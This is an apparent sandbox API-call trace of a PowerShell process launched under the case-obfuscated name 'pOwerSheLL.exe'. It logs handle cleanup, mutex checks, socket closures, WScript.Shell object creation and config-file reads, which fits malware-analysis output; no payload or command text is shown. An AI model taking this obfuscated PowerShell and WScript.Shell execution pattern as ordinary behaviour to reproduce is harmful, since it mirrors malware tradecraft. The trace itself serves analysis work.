0x0 [0029.957] RegCloseKey (hKey=0x394) returned 0x0 [0029.957] RegCloseKey (hKey=0x374) returned 0x0 [0029.957] RegCloseKey (hKey=0x3a8) returned 0x0 [0029.957] RegCloseKey (hKey=0x38c) returned 0x0 [0029.958] RegCloseKey (hKey=0x388) returned 0x0 [0029.958] RegCloseKey (hKey=0x384) returned 0x0 [0029.958] RegCloseKey (hKey=0x380) returned 0x0 [0029.958] RegCloseKey (hKey=0x37c) returned 0x0 [0029.958] RegCloseKey (hKey=0x378) returned 0x0 [0029.958] RegCloseKey (hKey=0x354) returned 0x0 [0029.959] RegCloseKey (hKey=0x3a4) returned 0x0 [0029.959] RegCloseKey (hKey=0x330) returned 0x0 [0031.107] RegCloseKey (hKey=0x338) returned 0x0 [0047.466] CloseHandle (hObject=0x470) returned 1 [0047.466] GetLastError () returned 0x0 [0047.466] CloseHandle (hObject=0x4f8) returned 1 [0047.466] GetLastError () returned 0x0 [0047.466] CloseHandle (hObject=0x4c8) returned 1 [0047.466] GetLastError () returned 0x0 [0047.467] CloseHandle (hObject=0x42c) returned 1 [0047.467] GetLastError () returned 0x0 [0047.467] CloseHandle (hObject=0x428) returned 1 [0047.467] GetLastError () returned 0x0 [0047.467] CloseHandle (hObject=0x424) returned 1 [0047.467] GetLastError () returned 0x0 [0047.467] CloseHandle (hObject=0x420) returned 1 [0047.467] GetLastError () returned 0x0 [0047.468] CloseHandle (hObject=0x41c) returned 1 [0047.468] GetLastError () returned 0x0 [0047.468] CloseHandle (hObject=0x524) returned 1 [0047.468] GetLastError () returned 0x0 [0047.468] CloseHandle (hObject=0x4c4) returned 1 [0047.468] GetLastError () returned 0x0 [0047.468] CloseHandle (hObject=0x40c) returned 1 [0047.468] GetLastError () returned 0x0 [0047.468] CloseHandle (hObject=0x408) returned 1 [0047.468] GetLastError () returned 0x0 [0047.469] CloseHandle (hObject=0x404) returned 1 [0047.469] GetLastError () returned 0x0 [0047.469] CloseHandle (hObject=0x400) returned 1 [0047.469] GetLastError () returned 0x0 [0047.469] CloseHandle (hObject=0x3fc) returned 1 [0047.469] GetLastError () returned 0x0 [0047.470] CloseHandle (hObject=0x3ec) returned 1 [0047.470] GetLastError () returned 0x0 [0047.470] CloseHandle (hObject=0x3f0) returned 1 [0047.470] GetLastError () returned 0x0 [0047.470] CloseHandle (hObject=0x3e8) returned 1 [0047.470] GetLastError () returned 0x0 [0047.471] CloseHandle (hObject=0x474) returned 1 [0047.471] GetLastError () returned 0x0 [0047.799] GetLastError () returned 0x0 [0047.799] GetLastError () returned 0x0 [0047.799] LocalFree (hMem=0xd0f10) returned 0x0 [0047.799] GetLastError () returned 0x0 [0047.799] GetLastError () returned 0x0 [0047.799] GetLastError () returned 0x0 [0047.799] LocalFree (hMem=0xcf480) returned 0x0 [0047.799] GetLastError () returned 0x0 [0047.799] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x21cb554, cbSid=0x1f6f3d8 | out: pSid=0x21cb554*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1f6f3d8) returned 1 [0047.799] GetLastError () returned 0x0 [0047.800] CreateMutexW (lpMutexAttributes=0x21cb664, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x358 [0047.800] GetLastError () returned 0x0 [0047.800] WaitForSingleObject (hHandle=0x358, dwMilliseconds=0x1f4) returned 0x0 [0047.800] GetLastError () returned 0x0 [0047.800] ReleaseMutex (hMutex=0x358) returned 1 [0047.800] GetLastError () returned 0x0 [0047.800] CloseHandle (hObject=0x358) returned 1 [0047.800] GetLastError () returned 0x0 [0047.800] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x21cb870, cbSid=0x1f6f3d8 | out: pSid=0x21cb870*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1f6f3d8) returned 1 [0047.800] GetLastError () returned 0x0 [0047.801] CreateMutexW (lpMutexAttributes=0x21cb980, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x358 [0047.801] GetLastError () returned 0x0 [0047.801] WaitForSingleObject (hHandle=0x358, dwMilliseconds=0x1f4) returned 0x0 [0047.801] GetLastError () returned 0x0 [0047.801] ReleaseMutex (hMutex=0x358) returned 1 [0047.801] GetLastError () returned 0x0 [0047.801] CloseHandle (hObject=0x358) returned 1 [0047.801] GetLastError () returned 0x0 [0047.801] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x21cbb8c, cbSid=0x1f6f3d8 | out: pSid=0x21cbb8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1f6f3d8) returned 1 [0047.801] GetLastError () returned 0x0 [0047.801] CreateMutexW (lpMutexAttributes=0x21cbc9c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x358 [0047.801] GetLastError () returned 0x0 [0047.801] WaitForSingleObject (hHandle=0x358, dwMilliseconds=0x1f4) returned 0x0 [0047.801] GetLastError () returned 0x0 [0047.801] ReleaseMutex (hMutex=0x358) returned 1 [0047.801] GetLastError () returned 0x0 [0047.802] CloseHandle (hObject=0x358) returned 1 [0047.802] GetLastError () returned 0x0 [0047.802] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x21cbea8, cbSid=0x1f6f3d8 | out: pSid=0x21cbea8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1f6f3d8) returned 1 [0047.802] GetLastError () returned 0x0 [0047.802] CreateMutexW (lpMutexAttributes=0x21cbfb8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x358 [0047.802] GetLastError () returned 0x0 [0047.802] WaitForSingleObject (hHandle=0x358, dwMilliseconds=0x1f4) returned 0x0 [0047.802] GetLastError () returned 0x0 [0047.802] ReleaseMutex (hMutex=0x358) returned 1 [0047.802] GetLastError () returned 0x0 [0047.802] CloseHandle (hObject=0x358) returned 1 [0047.802] GetLastError () returned 0x0 [0047.802] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x21cc1c4, cbSid=0x1f6f3d8 | out: pSid=0x21cc1c4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1f6f3d8) returned 1 [0047.802] GetLastError () returned 0x0 [0047.802] CreateMutexW (lpMutexAttributes=0x21cc2d4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x358 [0047.803] GetLastError () returned 0x0 [0047.803] WaitForSingleObject (hHandle=0x358, dwMilliseconds=0x1f4) returned 0x0 [0047.803] GetLastError () returned 0x0 [0047.803] ReleaseMutex (hMutex=0x358) returned 1 [0047.803] GetLastError () returned 0x0 [0047.803] CloseHandle (hObject=0x358) returned 1 [0047.803] GetLastError () returned 0x0 [0047.807] setsockopt (s=0x530, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0047.807] GetLastError () returned 0x0 [0047.807] closesocket (s=0x530) returned 0 [0047.807] GetLastError () returned 0x0 [0047.808] DeregisterEventSource (hEventLog=0x4390004) returned 1 [0047.809] GetLastError () returned 0x0 [0047.819] RegCloseKey (hKey=0x59c) returned 0x0 [0047.819] CloseHandle (hObject=0x594) returned 1 [0047.820] GetLastError () returned 0x0 [0047.820] CloseHandle (hObject=0x590) returned 1 [0047.820] GetLastError () returned 0x0 [0047.820] CloseHandle (hObject=0x58c) returned 1 [0047.820] GetLastError () returned 0x0 [0047.820] CloseHandle (hObject=0x574) returned 1 [0047.820] GetLastError () returned 0x0 [0047.820] CloseHandle (hObject=0x420) returned 1 [0047.820] GetLastError () returned 0x0 [0047.820] CloseHandle (hObject=0x4f8) returned 1 [0047.820] GetLastError () returned 0x0 [0047.821] CloseHandle (hObject=0x524) returned 1 [0047.821] GetLastError () returned 0x0 [0047.821] CloseHandle (hObject=0x334) returned 1 [0047.821] GetLastError () returned 0x0 [0047.821] CloseHandle (hObject=0x400) returned 1 [0047.821] GetLastError () returned 0x0 [0047.821] CloseHandle (hObject=0x324) returned 1 [0047.821] GetLastError () returned 0x0 [0047.821] CloseHandle (hObject=0x304) returned 1 [0047.821] GetLastError () returned 0x0 [0047.821] CloseHandle (hObject=0x300) returned 1 [0047.822] GetLastError () returned 0x0 [0047.822] CloseHandle (hObject=0x398) returned 1 [0047.822] GetLastError () returned 0x0 [0047.822] CloseHandle (hObject=0x394) returned 1 [0047.822] GetLastError () returned 0x0 [0047.822] CloseHandle (hObject=0x374) returned 1 [0047.822] GetLastError () returned 0x0 [0047.822] CloseHandle (hObject=0x3a8) returned 1 [0047.822] GetLastError () returned 0x0 [0047.823] CloseHandle (hObject=0x38c) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CloseHandle (hObject=0x388) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CloseHandle (hObject=0x384) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CloseHandle (hObject=0x380) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CloseHandle (hObject=0x37c) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CloseHandle (hObject=0x40c) returned 1 [0047.824] GetLastError () returned 0x0 [0047.824] CloseHandle (hObject=0x4c4) returned 1 [0047.824] GetLastError () returned 0x0 [0047.824] CloseHandle (hObject=0x554) returned 1 [0047.824] GetLastError () returned 0x0 [0047.824] CloseHandle (hObject=0x558) returned 1 [0047.824] GetLastError () returned 0x0 [0047.824] CloseHandle (hObject=0x580) returned 1 [0047.824] GetLastError () returned 0x0 [0047.824] CloseHandle (hObject=0x584) returned 1 [0047.824] GetLastError () returned 0x0 [0047.825] setsockopt (s=0x544, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0047.825] GetLastError () returned 0x273a [0047.825] closesocket (s=0x544) returned 0 [0047.825] GetLastError () returned 0x0 [0047.825] CloseHandle (hObject=0x548) returned 1 [0047.825] GetLastError () returned 0x0 [0047.825] CloseHandle (hObject=0x4c0) returned 1 [0047.825] GetLastError () returned 0x0 [0047.825] setsockopt (s=0x534, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0047.825] GetLastError () returned 0x273a [0047.826] closesocket (s=0x534) returned 0 [0047.826] GetLastError () returned 0x0 [0047.826] CloseHandle (hObject=0x540) returned 1 [0047.826] GetLastError () returned 0x0 [0047.826] CloseHandle (hObject=0x4bc) returned 1 [0047.826] GetLastError () returned 0x0 [0047.826] UnmapViewOfFile (lpBaseAddress=0x48d0000) returned 1 [0047.830] GetLastError () returned 0x0 [0047.830] RegCloseKey (hKey=0x4b8) returned 0x0 [0047.830] GetLastError () returned 0x0 [0047.831] CloseHandle (hObject=0x4b4) returned 1 [0047.831] GetLastError () returned 0x0 [0047.831] CloseHandle (hObject=0x47c) returned 1 [0047.831] GetLastError () returned 0x0 [0047.831] RegCloseKey (hKey=0x4b0) returned 0x0 [0047.831] GetLastError () returned 0x0 [0047.831] CloseHandle (hObject=0x4ac) returned 1 [0047.831] GetLastError () returned 0x0 [0047.831] RegCloseKey (hKey=0x4a8) returned 0x0 [0047.831] GetLastError () returned 0x0 [0047.831] RegCloseKey (hKey=0x4a4) returned 0x0 [0047.832] GetLastError () returned 0x0 [0047.832] CloseHandle (hObject=0x48c) returned 1 [0047.832] GetLastError () returned 0x0 [0047.832] setsockopt (s=0x484, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0047.832] GetLastError () returned 0x273a [0047.832] closesocket (s=0x484) returned 0 [0047.832] GetLastError () returned 0x0 [0047.832] CloseHandle (hObject=0x488) returned 1 [0047.832] GetLastError () returned 0x0 [0047.832] CloseHandle (hObject=0x32c) returned 1 [0047.832] GetLastError () returned 0x0 [0047.833] setsockopt (s=0x478, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0047.833] GetLastError () returned 0x273a [0047.833] closesocket (s=0x478) returned 0 [0047.833] GetLastError () returned 0x0 [0047.833] CloseHandle (hObject=0x480) returned 1 [0047.833] GetLastError () returned 0x0 [0047.833] RegCloseKey (hKey=0x80000004) returned 0x0 [0047.833] CloseHandle (hObject=0x2e8) returned 1 [0047.833] GetLastError () returned 0x0 [0047.834] CloseHandle (hObject=0x31c) returned 1 [0047.834] GetLastError () returned 0x0 [0047.834] UnmapViewOfFile (lpBaseAddress=0x1f00000) returned 1 [0047.835] CoGetContextToken (in: pToken=0x1f6e11c | out: pToken=0x1f6e11c) returned 0x0 [0047.835] CoGetContextToken (in: pToken=0x1f6e0ac | out: pToken=0x1f6e0ac) returned 0x0 [0047.835] IUnknown:Release (This=0xa392c) returned 0x0 [0047.836] IUnknown:Release (This=0x89258) returned 0x0 Thread: id = 22 os_tid = 0xa9c [0030.462] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0030.633] SetThreadUILanguage (LangId=0x0) returned 0x409 [0030.639] VirtualQuery (in: lpAddress=0x52ae0c0, lpBuffer=0x52af0c0, dwLength=0x1c | out: lpBuffer=0x52af0c0*(BaseAddress=0x52ae000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.720] GetLastError () returned 0xcb [0030.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.723] GetLastError () returned 0xcb [0030.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.741] GetLastError () returned 0xcb [0030.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.754] GetLastError () returned 0xcb [0030.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.756] GetLastError () returned 0xcb [0030.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.757] GetLastError () returned 0xcb [0030.763] VirtualQuery (in: lpAddress=0x52ae1dc, lpBuffer=0x52af1dc, dwLength=0x1c | out: lpBuffer=0x52af1dc*(BaseAddress=0x52ae000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.763] GetLastError () returned 0xcb [0030.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.765] GetLastError () returned 0xcb [0030.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.765] GetLastError () returned 0xcb [0030.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.771] GetLastError () returned 0xcb [0030.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.786] GetLastError () returned 0xcb [0030.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.818] GetLastError () returned 0xcb [0030.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.820] GetLastError () returned 0xcb [0030.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.821] GetLastError () returned 0xcb [0030.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.822] GetLastError () returned 0xcb [0030.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.823] GetLastError () returned 0xcb [0030.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.824] GetLastError () returned 0xcb [0030.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.825] GetLastError () returned 0xcb [0030.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.843] GetLastError () returned 0xcb [0030.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.943] GetLastError () returned 0xcb [0031.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0031.252] GetLastError () returned 0xcb [0031.341] VirtualQuery (in: lpAddress=0x52ade24, lpBuffer=0x52aee24, dwLength=0x1c | out: lpBuffer=0x52aee24*(BaseAddress=0x52ad000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0031.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0031.349] GetLastError () returned 0xcb [0031.373] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x52aea4c | out: lpclsid=0x52aea4c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0031.417] CoGetClassObject (in: rclsid=0x11de6c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x6331a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x52ae7dc | out: ppv=0x52ae7dc*=0xe0a2c) returned 0x0 [0031.495] WshShell:IUnknown:QueryInterface (in: This=0xe0a2c, riid=0x63407ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x52ae60c | out: ppvObject=0x52ae60c*=0x0) returned 0x80004002 [0031.495] WshShell:IClassFactory:CreateInstance (in: This=0xe0a2c, pUnkOuter=0x0, riid=0x63397714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x52ae644 | out: ppvObject=0x52ae644*=0xa392c) returned 0x0 [0031.496] IUnknown:QueryInterface (in: This=0xa392c, riid=0x63397714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x52ae3e8 | out: ppvObject=0x52ae3e8*=0xa392c) returned 0x0 [0031.496] IUnknown:QueryInterface (in: This=0xa392c, riid=0x633b4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x52ae3a4 | out: ppvObject=0x52ae3a4*=0x0) returned 0x80004002 [0031.496] IUnknown:QueryInterface (in: This=0xa392c, riid=0x632e0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x52ae298 | out: ppvObject=0x52ae298*=0x8d694) returned 0x0 [0031.499] IProvideClassInfo:GetClassInfo (in: This=0x8d694, ppTI=0x52ae290 | out: ppTI=0x52ae290*=0x8d6dc) returned 0x0 [0031.505] ITypeInfo:RemoteGetTypeAttr (in: This=0x8d6dc, ppTypeAttr=0x52ae2a4, pDummy=0x30cde775 | out: ppTypeAttr=0x52ae2a4, pDummy=0x30cde775) returned 0x0 [0031.505] ITypeInfo:LocalReleaseTypeAttr (This=0x8d6dc) returned 0xf0001 [0031.506] IUnknown:Release (This=0x8d694) returned 0x2 [0031.506] IUnknown:Release (This=0x8d6dc) returned 0x0 [0031.506] IUnknown:AddRef (This=0xa392c) returned 0x3 [0031.507] CoGetContextToken (in: pToken=0x52ae230 | out: pToken=0x52ae230) returned 0x0 [0031.507] CoGetObjectContext (in: riid=0x63397714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x16834c | out: ppv=0x16834c*=0x89258) returned 0x0 [0031.507] IUnknown:QueryInterface (in: This=0xa392c, riid=0x632923cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x52ae218 | out: ppvObject=0x52ae218*=0xa388c) returned 0x0 [0031.507] IMarshal:GetUnmarshalClass (in: This=0xa388c, riid=0x63397714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x52ae220 | out: pCid=0x52ae220*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0031.507] IUnknown:Release (This=0xa388c) returned 0x3 [0031.507] CoGetContextToken (in: pToken=0x52ae228 | out: pToken=0x52ae228) returned 0x0 [0031.507] IUnknown:AddRef (This=0xa392c) returned 0x4 [0031.507] IUnknown:QueryInterface (in: This=0xa392c, riid=0x632e767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x52ae29c | out: ppvObject=0x52ae29c*=0xa3914) returned 0x0 [0031.507] IUnknown:Release (This=0xa392c) returned 0x4 [0031.507] IRpcOptions:Query (in: This=0xa3914, pPrx=0xa392c, dwProperty=2, pdwValue=0x52ae2c0 | out: pdwValue=0x52ae2c0) returned 0x0 [0031.509] IUnknown:Release (This=0xa3914) returned 0x3 [0031.509] IUnknown:Release (This=0xa392c) returned 0x2 [0031.509] WshShell:IUnknown:Release (This=0xe0a2c) returned 0x0 [0031.510] IUnknown:Release (This=0xa392c) returned 0x1 [0031.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="") returned 0x0 [0031.847] GetLastError () returned 0xcb [0031.848] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp") returned 0x24 [0031.848] GetLastError () returned 0x0 [0031.872] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0xe4890, nSize=0x80 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp") returned 0x24 [0031.872] GetLastError () returned 0x0 [0032.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", nBufferLength=0x105, lpBuffer=0x52ae2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", lpFilePart=0x0) returned 0x3c [0032.047] GetLastError () returned 0x0 [0032.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", nBufferLength=0x105, lpBuffer=0x52ae284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", lpFilePart=0x0) returned 0x3c [0032.047] GetLastError () returned 0x0 [0032.057] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4785d60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0032.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe", nBufferLength=0x105, lpBuffer=0x52ae308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe", lpFilePart=0x0) returned 0x39 [0032.057] GetLastError () returned 0x0 [0032.100] GetCurrentProcess () returned 0xffffffff [0032.100] GetLastError () returned 0x3f0 [0032.101] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae41c | out: TokenHandle=0x52ae41c*=0x3e8) returned 1 [0032.101] GetLastError () returned 0x3f0 [0032.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x52adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0032.102] GetLastError () returned 0x0 [0032.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x52ae45c | out: lpFileInformation=0x52ae45c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0032.105] GetLastError () returned 0x0 [0032.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52adf74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0032.109] GetLastError () returned 0x0 [0032.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x52ae458 | out: lpFileInformation=0x52ae458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0032.109] GetLastError () returned 0x0 [0032.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52adec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0032.109] GetLastError () returned 0x0 [0032.109] SetErrorMode (uMode=0x1) returned 0x1 [0032.110] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3f0 [0032.110] GetLastError () returned 0x0 